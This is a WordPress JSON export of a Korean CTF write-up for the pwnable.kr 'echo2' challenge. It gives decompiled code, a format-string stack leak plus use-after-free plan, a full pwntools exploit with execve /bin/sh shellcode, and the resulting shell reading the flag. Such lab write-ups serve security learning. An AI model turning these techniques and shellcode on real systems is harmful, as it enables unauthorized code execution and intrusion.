{"id":2554,"date":"2024-05-25T06:28:50","date_gmt":"2024-05-24T21:28:50","guid":{"rendered":"https:\/\/h4ck.kr\/?p=2554"},"modified":"2024-05-25T06:28:51","modified_gmt":"2024-05-24T21:28:51","slug":"echo2","status":"publish","type":"post","link":"https:\/\/h4ck.kr\/?p=2554","title":{"rendered":"echo2"},"content":{"rendered":"\n

Description<\/h2>\n\n\n\n

Pwn this echo service.<\/p>\n\n\n\n

download : http:\/\/pwnable.kr\/bin\/echo2<\/p>\n\n\n\n

Running at : nc pwnable.kr 9011<\/p>\n\n\n\n

checksec <\/h2>\n\n\n\n
\n
ubuntu@wh1te4ever-main:~\/Desktop\/pwnable.kr-CTF\/echo2$ checksec .\/echo2\n[*] '\/home\/ubuntu\/Desktop\/pwnable.kr-CTF\/echo2\/echo2'\n    Arch:     amd64-64-little\n    RELRO:    Partial RELRO\n    Stack:    No canary found\n    NX:       NX disabled\n    PIE:      No PIE (0x400000)\n    RWX:      Has RWX segments<\/pre>\n<\/div><\/div>\n\n\n\n
Decompiled-src<\/h2>\n\n\n\n
main<\/h3>\n\n\n\n
\n
int __fastcall main(int argc, const char **argv, const char **envp)\n{\n  _QWORD *v3; \/\/ rax\n  unsigned int i; \/\/ [rsp+Ch] [rbp-24h] BYREF\n  __int64 v6[4]; \/\/ [rsp+10h] [rbp-20h] BYREF\n\n  setvbuf(stdout, 0LL, 2, 0LL);\n  setvbuf(stdin, 0LL, 1, 0LL);\n  o = malloc(0x28uLL);\n  *((_QWORD *)o + 3) = greetings;\n  *((_QWORD *)o + 4) = byebye;\n  printf(\"hey, what's your name? : \");\n  __isoc99_scanf(\"%24s\", v6);\n  v3 = o;\n  *(_QWORD *)o = v6[0];\n  v3[1] = v6[1];\n  v3[2] = v6[2];\n  id = v6[0];\n  getchar();\n  func[0] = (__int64)echo1;\n  qword_602088 = (__int64)echo2;\n  qword_602090 = (__int64)echo3;\n  for ( i = 0; i != 121; i = getchar() )\n  {\n    while ( 1 )\n    {\n      while ( 1 )\n      {\n        puts(\"\\n- select echo type -\");\n        puts(\"- 1. : BOF echo\");\n        puts(\"- 2. : FSB echo\");\n        puts(\"- 3. : UAF echo\");\n        puts(\"- 4. : exit\");\n        printf(\"> \");\n        __isoc99_scanf(\"%d\", &i);\n        getchar();\n        if ( i > 3 )\n          break;\n        ((void (*)(void))func[i - 1])();\n      }\n      if ( i == 4 )\n        break;\n      puts(\"invalid menu\");\n    }\n    cleanup();\n    printf(\"Are you sure you want to exit? (y\/n)\");\n  }\n  puts(\"bye\");\n  return 0;\n}<\/pre>\n<\/div><\/div>\n\n\n\n
echo1<\/h3>\n\n\n\n
\n
int echo1()\n{\n  return puts(\"not supported\");\n}<\/pre>\n<\/div><\/div>\n\n\n\n
echo2<\/h3>\n\n\n\n
\n
__int64 echo2()\n{\n  char format[32]; \/\/ [rsp+0h] [rbp-20h] BYREF\n\n  (*((void (__fastcall **)(void *))o + 3))(o);\n  get_input(format, 32LL);\n  printf(format);\n  (*((void (__fastcall **)(void *))o + 4))(o);\n  return 0LL;\n}<\/pre>\n<\/div><\/div>\n\n\n\n
echo3<\/h3>\n\n\n\n
\n
__int64 echo3()\n{\n  char *s; \/\/ [rsp+8h] [rbp-8h]\n\n  (*((void (__fastcall **)(void *))o + 3))(o);\n  s = (char *)malloc(32uLL);\n  get_input(s, 32LL);\n  puts(s);\n  free(s);\n  (*((void (__fastcall **)(void *))o + 4))(o);\n  return 0LL;\n}<\/pre>\n<\/div><\/div>\n\n\n\n
cleanup<\/h3>\n\n\n\n
\n
void cleanup()\n{\n  free(o);\n}<\/pre>\n<\/div><\/div>\n\n\n\n
Solution<\/h2>\n\n\n\n
1. main \ud568\uc218\uc758 v6 \uc9c0\uc5ed\ubcc0\uc218\uc5d0 \uc258\ucf54\ub4dc \uc0bd\uc785<\/p>\n\n\n\n
2. echo2 \ud568\uc218\ub97c \ud1b5\ud574 \uc2a4\ud0dd \uc8fc\uc18c\ub97c leak\ud558\uc5ec main \ud568\uc218\uc758 v6 \uc9c0\uc5ed\ubcc0\uc218\uc758 \uc8fc\uc18c\uac12 \ud68d\ub4dd<\/p>\n\n\n\n
3. (\uc5ec\uae30\uc11c\ubd80\ud130 UAF trigger \uc2dc\uc791) cleanup \ud568\uc218\ub97c \ud1b5\ud574 main \ud568\uc218\uc758 o \ubcc0\uc218\ub97c free<\/p>\n\n\n\n
4. echo3 \ud568\uc218\ub97c \ud1b5\ud574 o \ubcc0\uc218\uc5d0 \uc788\ub358 \uba54\ubaa8\ub9ac \uc8fc\uc18c\ub97c \ub2e4\uc2dc\ud55c\ubc88 \ub354 use\ud558\uc5ec, 
\bgreetings \ud568\uc218\uc8fc\uc18c\uac00 \uc801\ud78c \uc8fc\uc18c\uc5d0\ub2e4\uac00 \uc544\uae4c leak\ud558\uc5ec \ud68d\ub4dd\ud558\uba74\uc11c \ud68d\ub4dd\ud588\ub358 v6 \uc9c0\uc5ed\ubcc0\uc218\uc758 \uc8fc\uc18c\uac12\uc73c\ub85c \ub36e\uc5b4\uc4f4\ub2e4.<\/p>\n\n\n\n
5. \uc774\uc81c greetings \ud568\uc218\ub294 \ub354\uc774\uc0c1 \ud638\ucd9c\ub418\uc9c0 \uc54a\uace0 \uc258\ucf54\ub4dc\uac00 \uc2e4\ud589\ub41c\ub2e4.<\/p>\n\n\n\n
\n
from pwn import *\n#context.log_level = 'debug'\ncontext(arch='amd64', os='linux')\nwarnings.filterwarnings('ignore')\n\np = remote(\"pwnable.kr\", 9011)\n#p = process(\".\/echo2\")\ne = ELF('.\/echo2', checksec=False)\n\n# https:\/\/systemoverlord.com\/2016\/04\/27\/even-shorter-shellcode.html\nshellcode = b'\\x31\\xF6\\x56\\x48\\xBB\\x2F\\x62\\x69\\x6E\\x2F\\x2F\\x73\\x68\\x53\\x54\\x5F\\xF7\\xEE\\xB0\\x3B\\x0F\\x05'\np.sendlineafter(b\"hey, what's your name? : \", shellcode)\n\np.sendlineafter(b\"> \", b\"2\")\np.sendline(b'%9$p')\np.recvline()\nleaked_stack = p.recvline().split(b'\\n')[0]\nleaked_stack = int(leaked_stack, 16)\nsuccess(f\"leaked_stack: {hex(leaked_stack)}\")\n\np.sendline(b\"4\")\np.sendline(b\"n\")\n\np.sendlineafter(b\"> \", b\"3\")\np.sendline(b'C'*24 + p64(leaked_stack - 0x20))\n\np.interactive()<\/pre>\n<\/div><\/div>\n\n\n\n
Result<\/h2>\n\n\n\n
\n
ubuntu@wh1te4ever-main:~\/Desktop\/pwnable.kr-CTF\/echo2$ python3 solve.py\n[+] Opening connection to pwnable.kr on port 9011: Done\n[+] leaked_stack: 0x7ffd8af398f0\n[*] Switching to interactive mode\nAre you sure you want to exit? (y\/n)\n- select echo type -\n- 1. : BOF echo\n- 2. : FSB echo\n- 3. : UAF echo\n- 4. : exit\n> hello \nCCCCCCCCCCCCCCCCCCCCCCCC\u0418\\xf3\\x8a\\xfd\ngoodbye \n\n- select echo type -\n- 1. : BOF echo\n- 2. : FSB echo\n- 3. : UAF echo\n- 4. : exit\n> $ ls\necho2\nflag\nlog\nsuper.pl\n$ cat flag\nfun_with_UAF_and_FSB :)\n$ \n[*] Interrupted\n[*] Closed connection to pwnable.kr port 9011<\/pre>\n<\/div><\/div>\n","protected":false},"excerpt":{"rendered":"
Description Pwn this echo service. download : http:\/\/pwnable.kr\/bin\/echo2 Running at : nc pwnable.kr 9011 checksec Decompiled-src main echo1 echo2 echo3 cleanup Solution 1. main \ud568\uc218\uc758 v6 \uc9c0\uc5ed\ubcc0\uc218\uc5d0 \uc258\ucf54\ub4dc \uc0bd\uc785 2. echo2 \ud568\uc218\ub97c \ud1b5\ud574 \uc2a4\ud0dd \uc8fc\uc18c\ub97c leak\ud558\uc5ec main \ud568\uc218\uc758 v6 \uc9c0\uc5ed\ubcc0\uc218\uc758 \uc8fc\uc18c\uac12 \ud68d\ub4dd 3. (\uc5ec\uae30\uc11c\ubd80\ud130 UAF trigger \uc2dc\uc791) cleanup \ud568\uc218\ub97c \ud1b5\ud574 main \ud568\uc218\uc758 o \ubcc0\uc218\ub97c free… \ub354 \ubcf4\uae30 »echo2<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"neve_meta_sidebar":"","neve_meta_container":"","neve_meta_enable_content_width":"","neve_meta_content_width":0,"neve_meta_title_alignment":"","neve_meta_author_avatar":"","neve_post_elements_order":"","neve_meta_disable_header":"","neve_meta_disable_footer":"","neve_meta_disable_title":"","footnotes":""},"categories":[4],"tags":[32,35,25,45],"class_list":["post-2554","post","type-post","status-publish","format-standard","hentry","category-pwnable-kr","tag-format-string-bug","tag-heap","tag-pwnable","tag-uaf"],"_links":{"self":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/2554","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2554"}],"version-history":[{"count":1,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/2554\/revisions"}],"predecessor-version":[{"id":2555,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/2554\/revisions\/2555"}],"wp:attachment":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2554"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2554"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2554"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}